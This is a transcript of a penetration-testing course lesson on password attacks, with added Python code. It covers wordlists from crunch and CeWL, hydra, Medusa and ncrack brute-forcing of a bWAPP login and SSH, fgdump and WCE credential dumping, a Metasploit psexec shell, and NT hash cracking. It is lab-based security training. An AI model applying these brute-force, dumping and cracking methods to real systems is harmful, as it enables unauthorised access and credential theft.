Hello, everybody. Welcome to episode number 21 of the RCP course, Password attacks. My name is Alejandro Peña and I'll be your instructor for today's session.
The learning objectives of the session are to understand the concepts behind this attack and to apply some techniques to implement it. So let's get down to business, shall we?
Password attacks can mean a lot of things. I mean, you can consider several techniques to be a password attack, but let me just give you the two main concepts, or main techniques, of password attacks. One is the offline password attack, which is basically having the password, maybe encrypted or hashed, and actually trying to brute force that without any contact with the victim. The other is the online password attack, which is basically contacting the victim directly to see if your password worked, or maybe trying to brute force it to see if the passwords in your file actually apply to that machine.
For this scenario we'll be using the bWAPP machine from this module. Just so you know, we already know the password: the username is bee and the password is bug. Nothing to see here; it's just to demonstrate how these attacks can actually work.
So let me start with two amazing tools, which are crunch and CeWL. I'm just typing crunch here. These two tools have many uses, but I think the main usage is to create your own wordlist. Maybe you already know the password policy on the machine, that it has to include, I don't know, four letters and three numbers. So you just want to create that; you don't want to use any already created wordlist like rockyou or the others that come by default in Kali, you want to generate your own wordlist. That's where crunch and CeWL come in handy.

So let me just start by typing this simple crunch command, crunch 4 4, which basically generates words of length four. You know, the size of the password will be four. You can change that; maybe you know that you're trying to find a PIN number, not a password, so you can actually define the charset, the character set you want to use. For example, let me just go to the location of charset.lst and tell it numeric, so it will generate the same amount of values, but only numbers, because I want to brute force a PIN number that's four digits.

Or maybe you already know that the password is the letters ABC, in that order, or maybe the PIN is ABC but not in that order; you know the only letters that PIN can use are A, B, C and one number, for example abc1. So I'm telling it the format and the letters to use, and as you can see, it will generate all of this. This can be really cool. For example, you can generate more words; let me just paste this in here, which is basically telling it the same thing, but instead of four I'm guessing six characters, and I'm telling it to use all of this, from 0 to 9 and the first letters of the alphabet, and to put it in a wordlist called six_chars. That's it, there's no magic here. If you cat it, you'll see a bunch of passwords made of these characters.

The cool thing about this is that you can actually put something like, as we already know that the password is bug, crunch 3 3 with a limited character set, and I'm telling you this will generate it. If I grep for bug, the word will be in there. This is how customizable these tools can be.
Another cool tool is CeWL. Look at this: you can actually use CeWL to generate a wordlist from a web page. It will go into a kind of spider mode and generate a wordlist from the words that came from that web page. For example, let me just copy and paste this command so I can show you the example here. It generated, with -d 2 for the depth, which means it went to this page and the next page. The minimum word length for this is five, -m 5, and the wordlist will be written to this location with -w; the web page where it went to take all the possible words with a minimum length of five is this one. So if I go in here and cat this... sorry, this wordlist, just type it, you can see that the minimum is five, but it can go higher. But if I grep for bee, I will not find anything. Why do you think that is? I told the command to only take words that have a minimum length of five. So if I change that, same command but with 3, okay, three is fine. Let me just grep that. Now I can actually grep that, and you can see that the word bee is actually in here, and the word bug is there too. Okay: bugs, bug and buggy.
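Added example, editor's code and not something from the video: a small Python reimplementation of what crunch and CeWL do above, so you can see the keyspace you are about to fire at a target and why the CeWL minimum word length hid "bee" and "bug". generate_pattern() follows crunch's -t placeholder convention (@ lowercase, , uppercase, % digit, ^ symbol); words_from_html() parses a page the way CeWL does, skipping script and style bodies. The HTML page is constructed inline and is not bWAPP's real markup.

```python
"""Home-grown wordlist generation in the spirit of crunch and CeWL.

generate_all()     - every string of a given length over a charset (crunch 4 4 0123456789)
generate_pattern() - crunch -t style placeholders (@ , % ^), literals stay fixed
keyspace()         - how many candidates generate_all() will emit (check before you fire)
words_from_html()  - CeWL-style word harvesting from a page with a minimum word length
"""
import itertools
import re
import string
from html.parser import HTMLParser

# Placeholder classes as used by crunch -t.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",
}


def generate_all(min_len, max_len, charset):
    """Yield every string whose length is between min_len and max_len over charset."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def generate_pattern(pattern):
    """Expand a crunch-style pattern: literal characters are kept, each
    placeholder is replaced by every character of its class."""
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def keyspace(min_len, max_len, charset):
    """Number of candidates generate_all() produces: sum of |charset|^n."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


class _TextCollector(HTMLParser):
    """Collect visible text, ignoring anything inside <script> or <style>."""
    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skipping = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skipping += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skipping:
            self._skipping -= 1

    def handle_data(self, data):
        if not self._skipping:
            self.chunks.append(data)


def words_from_html(html, min_len=3):
    """CeWL-style extraction: alphanumeric tokens of at least min_len characters,
    in first-seen order, duplicates removed (CeWL's default minimum is 3)."""
    parser = _TextCollector()
    parser.feed(html)
    seen = []
    for token in re.findall(r"[A-Za-z0-9]+", " ".join(parser.chunks)):
        if len(token) >= min_len and token not in seen:
            seen.append(token)
    return seen


# Constructed sample page standing in for the bWAPP login page (not real bWAPP markup).
SAMPLE_HTML = """<html><head><title>bWAPP - Login</title>
<script>var bee = "not a word";</script></head>
<body><h1>bWAPP</h1><p>an extremely buggy web app</p>
<p>Login as bee with password bug. Bugs everywhere!</p></body></html>"""


if __name__ == "__main__":
    print("crunch 6 6 0123456789abcdef would emit", keyspace(6, 6, "0123456789abcdef"), "words")
    print("crunch -t bug% ->", list(generate_pattern("bug%")))
    print("cewl -m 5 ->", words_from_html(SAMPLE_HTML, 5))
    print("cewl -m 3 ->", words_from_html(SAMPLE_HTML, 3))
```

Running it shows the same effect as in the video: with a minimum length of 5 neither "bee" nor "bug" survives, with 3 both do, and the script body ("not a word") never makes it into the list.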
So this is a really cool tool. I do believe this could come in handy when you're trying to brute force a login page, for example. But yeah, this is all static so far. So how can we actually use these wordlists? Well, let's use some online attack techniques first.

For example, we can use hydra. Hydra can brute force login pages, and basically other services as well, to find users and passwords. So let me just copy this long command so I can explain it to you piece by piece. Let me just go to the beginning. -l, and capital -L: capital L tells it to use all the users included in a wordlist as the username, but let's not waste time on that, because we already know the user. Not capital L but lowercase -l is bee, because the user is actually bee, and the password is included in this file. What's the IP here? That's the IP of the bWAPP machine, which I'm just typing so you can see it.

Let's continue. http-post-form: this is the form I'll be using, or the module, and it goes to this web page, which is /bWAPP/ba_pwd_attacks_1.php, and then it tells it to use the login and all of this you can see in here, well, maybe except for this. But, you know, again: the password, the form, the cookie, the cookie itself, the security level, all this stuff, SQLiteManager current theme, SQLiteManager current language. All of this I took from Burp. I mean, I didn't really know it; I intercepted the connection and I saw that whenever I logged in, Burp was capturing this, and the browser was actually sending this to the web server. So this is how I know to use all of this. And, you know, I'm just telling it to use, in this case... I cannot use this anymore, because the user is actually bee. Well, actually I can leave it like that. Let me just... then I'm telling it that the invalid, or, you know, the fail text is "Invalid credentials! Did you forget your password?" That's because if I go here and put test/test, it says "Invalid credentials! Did you forget your password?", and I'm telling it that every time this text comes up it means the username or password is incorrect. Now, this can produce several false positives, because at the end maybe the text didn't come complete, or maybe it came in a different format, so this can yield several false positives.

Let's give it a try. Okay, it's logging in. Okay, a lot of false positives, but I believe you get the point. This will actually try to log in to the web page. I'm just cutting it here because this bWAPP machine is really old; it can't take a lot of concurrent connections. Let me just paste it in here; maybe I will not paste it here, maybe in the text editor, so you can actually see the command, the whole story. Let me just paste it in the terminal; I didn't want to waste the terminal history, but, you know.
You can also use Medusa instead of hydra, which will achieve the same goal. It's the same thing: I'm telling it that the user is bee, the password, the form, the deny string, which is the same, the form data, the login and password fields of the form, the cookie. Everything is the same; you can achieve exactly the same thing. But I don't want to waste any time on this. As I already told you, same syntax, same results. I want to show you that you can actually do the same thing for different services. Let me show you that by using a different tool. Now, I already created a username, it's called alejandropena, on my local machine. Let me just show it to you.
It's already in there. It has a really shameful password, I believe, but the point remains. Let me just echo the password here. Oops, it was replaced. Oh my God. Okay, there you go.

And if I go to this... I mean, just type this syntax in here, ncrack, which again, same as Medusa, you can do that. This is what I'm about to do here, which is basically brute force an SSH service. You can do it as well with Medusa and with hydra; it's the same thing. I'm just trying to show you three different tools to do the same thing. So let me just put it in here: ncrack, that's localhost, because it's the local host, with the user, alejandropena, -P, which is the password list, capital because I'm going to introduce a wordlist, and what I'm about to hit is SSH. It will take a while, because at the end it will brute force every possible combination. And it says that it finished some seconds ago, with timeouts. I messed up that wordlist. I mean, check it out. But that's the syntax, so I can actually use that user, alejandropena, the password list is the one sitting here, and the module is ssh. And you can brute force this again. Let me check we have the service up: service ssh start.
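Added example, editor's code and not something from the video or from hydra, Medusa or ncrack: the online guessing loop that all three tools run, written out in Python against a local mock of the bWAPP ba_pwd_attacks_1.php form so it runs offline. The point is the false-positive problem mentioned above: a response that simply lacks the failure string is not proof of a valid login, so the classifier returns "unknown" for pages that contain neither the failure text nor an independent success marker, and the loop reports those separately instead of as hits. Field names (login, password, form=submit), the failure text and the "Welcome Bee" success marker are modelled on bWAPP but are assumptions; the mock deliberately returns a truncated error page for one candidate to simulate a flaky response.

```python
"""Online password guessing against a login form, hydra http-post-form style,
with a response classifier that separates clear failures from suspicious
responses instead of treating "fail text missing" as a valid login.

The target is a constructed mock of bWAPP's ba_pwd_attacks_1.php started in a
background thread on a loopback port, so the script runs offline.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Failure string we would give hydra after observing a bad login in Burp.
FAIL_TEXT = "Invalid credentials"
# Independent success marker (assumed for the mock page).
SUCCESS_TEXT = "Welcome Bee"


class MockLogin(BaseHTTPRequestHandler):
    """Mock login form. Valid credentials: bee / bug. The candidate 'admin'
    gets a truncated error page to simulate a flaky or partial response."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("login", [""])[0]
        password = form.get("password", [""])[0]
        if user == "bee" and password == "bug":
            body = "<p>Welcome Bee, you are logged in.</p>"
        elif password == "admin":
            body = "<p>Invalid cred"  # truncated: neither marker present
        else:
            body = "<p>Invalid credentials! Did you forget your password?</p>"
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_mock_server():
    """Start the mock on an ephemeral loopback port; returns the server object."""
    server = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


# Ignore proxy environment variables so loopback traffic stays local.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def attempt(url, user, password, cookie=""):
    """One login attempt with the form fields the bWAPP page expects; returns the body."""
    fields = {"login": user, "password": password, "form": "submit"}
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, data=urllib.parse.urlencode(fields).encode(),
                                 headers=headers)
    with _opener.open(req, timeout=5) as resp:
        return resp.read().decode(errors="replace")


def classify(body):
    """'fail' if the known failure text is present, 'success' if the success
    marker is, otherwise 'unknown' (truncated or odd page: review manually)."""
    if FAIL_TEXT in body:
        return "fail"
    if SUCCESS_TEXT in body:
        return "success"
    return "unknown"


def brute_force(url, user, candidates, cookie=""):
    """Try each candidate in order; return (password or None, suspect candidates)."""
    suspects = []
    for password in candidates:
        verdict = classify(attempt(url, user, password, cookie))
        if verdict == "success":
            return password, suspects
        if verdict == "unknown":
            suspects.append(password)
    return None, suspects


if __name__ == "__main__":
    srv = start_mock_server()
    url = "http://127.0.0.1:%d/bWAPP/ba_pwd_attacks_1.php" % srv.server_address[1]
    print(brute_force(url, "bee", ["test", "admin", "password", "bug"],
                      cookie="security_level=0"))
    srv.shutdown()
```

Against the mock, the run returns ("bug", ["admin"]): the real password, plus the one candidate whose response could not be classified and would have been a false positive under a plain "failure text absent means success" rule.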
Another cool thing you can use is fgdump, and WCE, which is Windows Credential Editor. fgdump dumps the password hashes of the users that are actually on a Windows machine. Let me just leave this running so we can come back and check the results. But, you know, fgdump is an executable you can use in Windows. I have my Windows XP machine here, and this comes by default in Kali. Let me just copy and paste it to the web root, from /usr/share/windows-binaries in the Kali box, and just copy and paste fgdump.exe, which again just dumps the password hashes of the users on the machine. Maybe you're trying to escalate privileges, so you can just do that.

So let me just copy it here and go to my Windows machine. Let me just drag this so you can see it. Now that I have it, I can just run it, and it will create... oh, I didn't tell it where to save the data. My bad, sorry. Go to the Downloads folder and just run it. You can see it created some files. Opening these files, some of them are just informational, and this is what we're interested in: it has all the NTLM hashes, which, by the way, is what Windows uses. It has all the NTLM hashes, so we can try to brute force this file itself; we can copy those hashes back to our Kali machine.

Or, you know, let me just refresh your memory here by launching a kind of malicious attack, remember, the famous psexec attack from Metasploit, and actually exploit the Windows machine itself. show options really quickly, set RHOST to our Windows XP. Nothing to see here, folks, I just hacked a machine. And I can actually try to gain a shell in here, so I can just go shell and surf to this. Let me just get the Meterpreter again; I can just surf to the Windows location, which is basically, let me just show it to you, C:\Documents and Settings. Okay, let me just get shell. And what was the path again? I'm really bad with paths. Documents and Settings, owned, which is the user, by the way, My Documents, Downloads. Okay, remember the directory: cd "My Documents". And I can just use the command type, because that's kind of the equivalent of the cat command in Windows. So I just type type, the file here, and I have the hashes in here. That was just a refresher for you guys to see how it is to hack a Windows machine. So I can just copy that file, the output of the following command. Let me just copy all of this.
Let me see if this really finished. Okay, it finished. It told me: the password is test123 and the username is this one. So yeah, all good on that front. So let me just create here... yeah, let me just paste it in here so I have all of this. Let me just eliminate all of this, because I'm not interested in any of this information, I'm just interested in this one. And I saved it.

And then, you know, I already have the wordlist. Remember, we already know the password, but this is the command that you should use for offline, which is what I'm about to do right now: offline password cracking. You can use the tool john, which is a reference to John the Ripper. Let me just give you the syntax here: john --format, with the format, --wordlist, and basically just point to the wordlist we created with CeWL, remember, and then the file where we actually have the hash. So we're telling John to use this format and to take the words from this wordlist. We already know the password, test123; this is the password that generated this NTLM hash, so we just want to execute that. Okay, there it is: test123. So we can see how we can perform several types of password attacks, but a really more dangerous one, and I don't want to show you guys much of it because it's just downloading the application and running it, is WCE, Windows Credential Editor.
Let me just go to the web page. These guys created an executable, again, WCE, Windows Credential Editor, which is basically the same as fgdump, but it dumps the passwords in plain text. This is kind of amazing to me; the first time I saw this, I'll tell you, it blew my mind. So yeah, I won't waste time: just download the executable and run it, because that's all it takes, and you can actually see the results from that.
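Added example, editor's code and not from the video or from John the Ripper: the offline step above, cracking NT hashes from a pwdump-style file against a wordlist, in Python. An NT hash is MD4 over the UTF-16LE encoding of the password; because hashlib frequently lacks MD4 (OpenSSL 3 moved it to the legacy provider), a compact RFC 1320 MD4 is included. The hash lines are constructed: the LM field is the well-known "no LM hash" value, the Administrator entry carries the widely published NT hash of "password", and the Guest entry carries the NT hash of an empty password, which stays uncracked because the sample wordlist does not contain it.

```python
"""Offline cracking of NT hashes, the step John does with --format=nt.

NT hash = MD4(UTF-16LE(password)). Input lines follow the pwdump/fgdump layout
user:rid:lmhash:nthash:::. Candidates are hashed once each and matched against
every target at the same time.
"""
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                s = shifts[i % 4]
                if i % 4 == 0:
                    a = _rotl((a + func(b, c, d) + x[k] + const) & _MASK, s)
                elif i % 4 == 1:
                    d = _rotl((d + func(a, b, c) + x[k] + const) & _MASK, s)
                elif i % 4 == 2:
                    c = _rotl((c + func(d, a, b) + x[k] + const) & _MASK, s)
                else:
                    b = _rotl((b + func(c, d, a) + x[k] + const) & _MASK, s)
        a, b, c, d = ((a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM and printed by pwdump tools (lowercase hex)."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text):
    """Parse user:rid:lmhash:nthash::: lines into {user: nthash}."""
    entries = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[3]:
            entries[parts[0]] = parts[3].lower()
    return entries


def crack(entries, wordlist):
    """Dictionary attack: hash each candidate once, compare against all targets.
    Returns {user: password} for every hash that matched."""
    targets = {}
    for user, nthash in entries.items():
        targets.setdefault(nthash, []).append(user)
    found = {}
    for candidate in wordlist:
        for user in targets.get(nt_hash(candidate), ()):
            found[user] = candidate
        if len(found) == len(entries):
            break
    return found


# Constructed pwdump-style output, not taken from the video's machine.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
# Constructed wordlist; "password" matches Administrator, nothing matches Guest.
SAMPLE_WORDLIST = ["bee", "bug", "test123", "password", "letmein"]


if __name__ == "__main__":
    entries = parse_pwdump(SAMPLE_PWDUMP)
    print("targets:", entries)
    print("cracked:", crack(entries, SAMPLE_WORDLIST))
```

The lesson is the one the video makes with CeWL and crunch: the attack is only as good as the wordlist. Guest's hash is the NT hash of an empty password, yet it stays uncracked until a candidate for it is in the list, which is why adding the empty string to the wordlist recovers it.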
What is the main usage for crunch and CeWL? Well, you can create your own wordlist. For example, you can actually get the wordlist from a web page by using CeWL. So these are two nice tools to use.
Can we actually gain remote control with this attack? Yeah, we can. We can figure out passwords, we can brute force login sessions; I mean, yeah, we can definitely gain remote control.
In this video we learned the concepts of this attack, we applied some techniques to execute this attack, and we also saw how malicious this attack can be.
Supplemental materials: The Hacker Playbook, again, nothing new on this front, and every possible resource you can find on Google and YouTube.
Looking forward, in the next video we will cover public exploits.
Well, that's it for today, folks. I hope you enjoyed the video, and talk to you soon.